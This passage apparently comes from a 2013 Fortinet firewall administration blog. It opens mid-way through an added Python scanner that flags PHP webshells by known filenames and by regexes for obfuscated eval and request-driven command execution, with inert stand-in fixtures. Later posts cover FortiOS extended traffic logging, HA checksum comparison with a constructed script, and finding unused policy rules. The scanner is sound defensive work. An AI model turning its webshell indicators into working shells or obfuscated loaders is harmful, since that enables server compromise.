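KNOWN_SHELL_NAMES = {"c99.php", "c100.php", "r57.php", "b374k.php"}  # names from the post
INDICATORS = {
    "obfuscated eval": re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "command execution from request": re.compile(
        rb"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b"),
    "uname -a banner": re.compile(rb"uname -a"),
}
PHP_EXTENSIONS = (".php", ".phtml", ".php3", ".php4", ".php5", ".phps")


def scan_bytes(name: str, data: bytes) -> List[str]:
    """Return the list of indicators that a file with this name and content triggers."""
    reasons = []
    if name.lower() in KNOWN_SHELL_NAMES:
        reasons.append("known webshell filename")
    for label, pat in INDICATORS.items():
        if pat.search(data):
            reasons.append(label)
    return reasons


def scan_webroot(root: str) -> List[Tuple[str, List[str]]]:
    """Walk `root` and return (relative path, reasons) for every PHP file that triggers an indicator."""
    hits: List[Tuple[str, List[str]]] = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with open(full, "rb") as fh:
                    data = fh.read(1024 * 1024)  # first MiB is enough for these patterns
            except OSError:
                continue
            reasons = scan_bytes(fname, data)
            if reasons:
                hits.append((os.path.relpath(full, root).replace(os.sep, "/"), reasons))
    return sorted(hits)


def build_sample_webroot() -> str:
    """Create a constructed web root in a temp dir; the flagged files are inert stand-ins."""
    root = tempfile.mkdtemp(prefix="webroot_sample_")
    fixtures = {
        "index.php": "<?php echo 'hello'; ?>\n",
        "uploads/r57.php": "<?php /* constructed stand-in: only the banner text */ echo 'uname -a'; ?>\n",
        "img/cache.php": "<?php /* constructed stand-in; decodes to 'echo 1;' */ eval(base64_decode('ZWNobyAxOw==')); ?>\n",
        "css/style.css": "body { color: #000; }\n",
    }
    for rel, content in fixtures.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel_path, reasons in scan_webroot(build_sample_webroot()):
        print(f"{rel_path}: {', '.join(reasons)}")
```

A hit on a filename alone is worth a look, but the content patterns are what catch a shell that has been renamed; files in upload or image directories that contain PHP at all deserve the same scrutiny.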



Posted on Tuesday, June 04, 2013 by Javier Nieto

No comments

If you have recently upgraded your Fortigate firewall to FortiOS 4.0 MR3, perhaps you have noticed an increase in the traffic log volume.

FortiOS 4.0 MR3 has extended-traffic-log enabled by default, whereas in previous versions it was disabled by default.

If you want to disable this new default, these are the commands:

  • config log [memory|disk|fortianalyzer|...] filter
  • set extended-traffic-log [enable|disable]
  • end

What does the log filter setting "other-traffic" display?

Posted on Tuesday, June 04, 2013 by Javier Nieto

No comments

Monday, June 03, 2013

When you build a firewall cluster in High Availability, you need to be sure that the cluster members are fully synchronized.

I am going to give you some commands to switch the CLI session between the members and check your HA.

First of all, you need to see how many members there are. If you have an active-passive cluster, you need to know which one is the master. For this, execute: # get system ha status


Then you need to know the VDOMs and all the configuration hashes. For this, execute: # get system checksum status
 

You need to compare the hashes between the members; they must be identical. You switch to another member by executing:
# execute ha manage 1


Finally, compare the hashes: # get system checksum status


If the hashes are the same, your cluster is OK; if not, you need to solve the problem, because one or more cluster members are misconfigured.
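An added example, not Fortinet's own tooling: Python that parses two captures of get system checksum status and reports which entries (global, each VDOM, all) differ, so the comparison in the last step does not have to be done by eye. The two outputs are constructed to follow the command's "name: hex bytes" line format and every checksum value is made up.

```python
"""Compare `get system checksum status` output from two HA members.

Added example, not a Fortinet tool. MASTER and SLAVE are constructed to
look like that command's output (one "<name>: <hex bytes>" line per VDOM
plus the global and all entries); every checksum value is made up.
"""
import re
from typing import Dict, List, Tuple

MASTER = """\
global: 1c 2d 3e 4f 5a 6b 7c 8d 9e af b0 c1 d2 e3 f4 05
root: a1 b2 c3 d4 e5 f6 07 18 29 3a 4b 5c 6d 7e 8f 90
dmz: 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff 00
all: 0f 1e 2d 3c 4b 5a 69 78 87 96 a5 b4 c3 d2 e1 f0
"""

# Second member: the dmz VDOM differs by one byte, so the "all" entry differs too.
SLAVE = """\
global: 1c 2d 3e 4f 5a 6b 7c 8d 9e af b0 c1 d2 e3 f4 05
root: a1 b2 c3 d4 e5 f6 07 18 29 3a 4b 5c 6d 7e 8f 90
dmz: 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff 01
all: 0f 1e 2d 3c 4b 5a 69 78 87 96 a5 b4 c3 d2 e1 f1
"""

LINE_RE = re.compile(r"^\s*([\w-]+):\s*((?:[0-9a-fA-F]{2}\s*)+)$")


def parse_checksums(text: str) -> Dict[str, str]:
    """Map each entry name (global, all, each VDOM) to its checksum as one hex string."""
    out: Dict[str, str] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out[m.group(1)] = re.sub(r"\s+", "", m.group(2)).lower()
    return out


def compare_members(a_text: str, b_text: str) -> List[Tuple[str, str, str]]:
    """Return (name, checksum_a, checksum_b) for every entry that differs or is missing on one side."""
    a, b = parse_checksums(a_text), parse_checksums(b_text)
    diffs = []
    for name in sorted(set(a) | set(b)):
        if a.get(name) != b.get(name):
            diffs.append((name, a.get(name, "<missing>"), b.get(name, "<missing>")))
    return diffs


def cluster_in_sync(a_text: str, b_text: str) -> bool:
    """True when both members report identical checksums for every entry."""
    return not compare_members(a_text, b_text)


if __name__ == "__main__":
    for name, ca, cb in compare_members(MASTER, SLAVE):
        print(f"{name}: master={ca} slave={cb}")
    print("in sync:", cluster_in_sync(MASTER, SLAVE))
```

When only one VDOM plus "all" differ, the mismatch is confined to that VDOM's configuration, which narrows down where to look; an entry missing on one side means the VDOM itself does not exist there.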




Posted on Monday, June 03, 2013 by Javier Nieto

No comments

Sometimes firewall security administrators have told me: "I have a lot of policy rules on my firewall, how can I discover unused policy rules?" or "I just created a new policy rule, how can I know if this rule has been matching?"

With Fortinet firewalls this is really easy to do.

First of all, you need to add a new column in the Policy -> Policy section.


Add the Count option to the right-hand field.

 

Finally, you will see whether the rule has been matched and how many packets and megabytes have crossed through the policy rule.


The counters of all policy rules are reset to "0 packets/0 B" when the firewall is rebooted. If the last time you rebooted your firewall was one year ago and you still have policy rules showing "0 packets/0 B", maybe these rules are unnecessary.

You can also reset a policy rule's counter to 0 manually by right-clicking on the policy and selecting "Clear Counters".



Posted on Monday, June 03, 2013 by Javier Nieto

1 comment